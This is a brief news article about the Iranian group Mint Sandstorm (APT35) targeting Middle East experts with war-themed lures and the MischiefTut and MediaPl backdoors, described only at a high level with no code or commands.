Iranian cyber espionage group Mint Sandstorm attacks Middle East experts

19 January 2024 2 minutes Author: Newsman

Apt 35

In a complex series of cyberattacks that began in November 2023, the Iranian group Mint Sandstorm, which is potentially linked to Iran’s Islamic Revolutionary Guard Corps, targeted Middle Eastern experts.

The group, also known as APT35, Charming Kitten, TA453 and Yellow Garuda, uses malware, including the new “MediaPl” backdoor, to refine its post-intrusion strategies. These attacks are part of nation-state intelligence-gathering efforts. The modus operandi involves using compromised email accounts and curl commands to connect to the command and control (C2) infrastructure.

The latest set of intrusions is characterized by the use of decoys associated with the Israel-Hamas war, sending innocuous emails impersonating journalists and other high-ranking individuals to build relationships with targets and establish a level of trust before attempting to deliver malware to the target. Microsoft said the campaign was likely an attempt by the nation-state threat to gather views on war-related events.

This script paves the way for more sinister payloads such as MischiefTut and MediaPl. MischiefTut, a PowerShell-implemented backdoor first spotted in late 2022, is capable of executing intelligence commands and downloading tools onto compromised systems. MediaPl masquerades as Windows Media Player and can send encrypted commands to the C2 server.

Such tools demonstrate Mint Sandstorm’s progress in adapting tools to support a covert presence in target environments, highlighting the sophistication of groupings.

Other related articles
Found an error?
If you find an error, take a screenshot and send it to the bot.